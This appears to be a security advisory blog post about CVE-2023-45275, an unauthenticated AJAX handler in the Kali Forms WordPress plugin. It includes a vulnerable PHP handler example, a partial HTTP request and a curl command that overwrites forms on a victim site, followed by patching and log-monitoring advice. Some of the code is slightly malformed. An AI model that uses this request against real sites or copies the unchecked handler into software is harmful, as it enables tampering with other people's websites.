CVE-2023-45275 - Exploiting Missing Authorization in Kali Forms Contact Form Builder (Versions through 2.3.28)

Kali Forms is a popular WordPress plugin for creating forms using a simple drag & drop interface. Recently, a critical security vulnerability was discovered: CVE-2023-45275. This vulnerability allows unauthorized users to access and modify protected resources due to missing access controls.

In this post, we’ll explain what went wrong, how it can be exploited, and what you should do to stay safe.

What is CVE-2023-45275?

CVE-2023-45275 is a Missing Authorization issue in the Contact Form Builder with Drag & Drop - Kali Forms WordPress plugin, affecting versions up to 2.3.28.

> The vulnerability lets unauthenticated attackers (anyone) perform actions or access data that should be restricted to authorized WordPress users—sometimes even as an admin.

Where’s the Problem?

Kali Forms uses AJAX handlers — special PHP functions responding to AJAX calls from the website’s back-end and front-end. The problem arises when some of those handlers don’t check a user’s capability level or authentication status, allowing direct access over the internet.

Let’s look at a simplified example.

// Typical AJAX handler in a vulnerable Kali Forms version

add_action('wp_ajax_kaliforms_save_form', 'kaliforms_save_form_handler');
add_action('wp_ajax_nopriv_kaliforms_save_form', 'kaliforms_save_form_handler'); // <- Problematic!

function kaliforms_save_form_handler() {
    // Missing authentication and capability checks!
    $form_data = $_POST['form'];
    update_option('kaliforms_forms', $form_data);

    echo json_encode(['status' => 'form saved']);
    wp_die();
}

Because both wp_ajax_* and wp_ajax_nopriv_* actions are present and there are no permission checks, anyone—including users *not* logged in—can use this handler to overwrite forms!

Reconnaissance:

The attacker scans the website to confirm that Kali Forms is active (e.g., by checking /wp-content/plugins/kali-forms/ existence).

Craft the Exploit Request:

The attacker crafts a POST request (using a tool like curl, Postman, or Burp Suite) to an AJAX action exposed by the plugin.

`http

POST /wp-admin/admin-ajax.php?action=kaliforms_save_form
Content-Type: application/x-www-form-urlencoded

Result:

The server *overwrites* or creates new forms—even inserting malicious code (like JavaScript for future attacks), all without login.

Here’s a quick demonstration using curl

curl -X POST "https://victim.site/wp-admin/admin-ajax.php?action=kaliforms_save_form"; \
     -d "form={\"id\":1,\"title\":\"Pwned!\",\"fields\":[{\"type\":\"text\",\"label\":\"Injected Field\"}]}"

This would overwrite the form with ID 1, setting the title and fields as chosen by the attacker.

Update Immediately:

Download the latest version of Kali Forms here and update your site. Fixes are included in later releases.

Monitor for Exploitation:

Watch logs for POSTs to wp-admin/admin-ajax.php with actions like kaliforms_save_form from untrusted IPs.

References

- Official WP Kali Forms Plugin Page
- WPScan Advisory for CVE-2023-45275
- NIST CVE Record

Conclusion

CVE-2023-45275 is a simple but dangerous oversight in access control in a popular form plugin. The lack of authorization checks made it trivial for bad actors to alter, inject, or steal data from WordPress sites. If you use Kali Forms, update ASAP and always verify that your plugins are using strict access control in their code.

Stay safe—and always keep your software up to date!


If you found this post useful, share with your fellow WordPress users and help the community stay secure.

Timeline

Published on: 01/02/2025 12:15:09 UTC